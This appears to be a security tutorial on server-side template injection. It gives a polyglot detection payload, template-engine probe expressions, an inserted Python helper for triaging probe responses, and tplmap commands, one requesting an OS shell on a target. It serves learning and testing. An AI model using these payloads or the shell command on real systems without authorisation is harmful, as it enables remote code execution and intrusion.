SSTI

What is SSTI?

Server-side template injection (SSTI) is a vulnerability in which an attacker injects malicious input into a server-side template so that the template engine evaluates it as template code rather than as data. It occurs when untrusted user input is embedded directly into the template source, and it commonly leads to remote code execution (RCE).

Some of the most popular template engines are:

  • PHP – Smarty, Twig

  • Java – Velocity, FreeMarker

  • Python – Jinja2, Mako, Tornado

  • JavaScript – Jade (now Pug), Rage

  • Ruby – Liquid

How Does It Work?

For simplicity, imagine you are testing the parameter of the following request:

POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com

parameter=value

To detect the vulnerability, send a polyglot payload as the parameter value: a sequence of special characters that is invalid syntax in several template engines at once, so a vulnerable application raises a template error:

POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com

parameter=${{<%[%'"}}%\.

To identify the template engine, read the error message; it often names the engine or its parser.

If the error message does not reveal the template engine, test the known syntaxes of the popular engines and check which one is evaluated rather than echoed back:

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
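As an added example (not part of the original note), a small Python helper for triaging the responses to the five probes above when testing your own application: it separates a probe that was evaluated server-side from one that was merely reflected or HTML-escaped, and narrows down the candidate engine family. The syntax-to-engine mapping and the sample responses are my own assumptions, not taken from the page.

```python
import html

# The five probe syntaxes from the note, with A and B as placeholders so the
# operands can be varied: a page that happens to contain "49" is not proof,
# so re-probe with different operands before concluding anything.
# Engine mapping is an assumption from general knowledge, not from the note.
SYNTAXES = {
    "{{A*B}}":    ["Jinja2", "Twig", "Tornado"],
    "${A*B}":     ["FreeMarker", "Mako"],
    "<%= A*B %>": ["ERB"],
    "${{A*B}}":   ["Jinja2", "Twig", "Tornado"],   # renders as "$" + product
    "#{A*B}":     ["Jade/Pug", "Slim"],
}


def build_probe(syntax: str, a: int, b: int) -> tuple[str, str]:
    """Return (probe string, substring expected in the body if it was evaluated)."""
    probe = syntax.replace("A", str(a)).replace("B", str(b))
    product = str(a * b)
    expected = "$" + product if syntax.startswith("${{") else product
    return probe, expected


def classify(probe: str, expected: str, response: str) -> str:
    """Decide what the server did with one probe."""
    if probe in response:
        return "reflected"   # echoed verbatim: not evaluated by a template engine
    if html.escape(probe, quote=True) in response:
        return "escaped"     # output-encoded on the way out, still not evaluated
    if expected in response:
        return "evaluated"   # arithmetic happened server-side: SSTI likely
    return "absent"


def triage(responses: dict[str, str], a: int = 7, b: int = 7) -> dict[str, str]:
    """responses maps each syntax key to the body returned for that probe."""
    return {s: classify(*build_probe(s, a, b), responses[s]) for s in responses}


def candidate_engines(verdicts: dict[str, str]) -> set[str]:
    """Engines consistent with every syntax that evaluated (empty set if none did)."""
    candidates = None
    for syntax, verdict in verdicts.items():
        if verdict == "evaluated":
            engines = set(SYNTAXES[syntax])
            candidates = engines if candidates is None else candidates & engines
    return candidates or set()


# Constructed sample: what a Jinja2-backed greeting page with autoescape
# enabled would plausibly return for each probe (hypothetical data).
SAMPLE_RESPONSES = {
    "{{A*B}}":    "<p>Hello 49</p>",
    "${A*B}":     "<p>Hello ${7*7}</p>",
    "<%= A*B %>": "<p>Hello &lt;%= 7*7 %&gt;</p>",
    "${{A*B}}":   "<p>Hello $49</p>",
    "#{A*B}":     "<p>Hello #{7*7}</p>",
}
```

Run triage twice with different operands (for example a=3, b=11) and only treat a syntax as evaluated when both runs agree.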

Exploit

Tools

python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
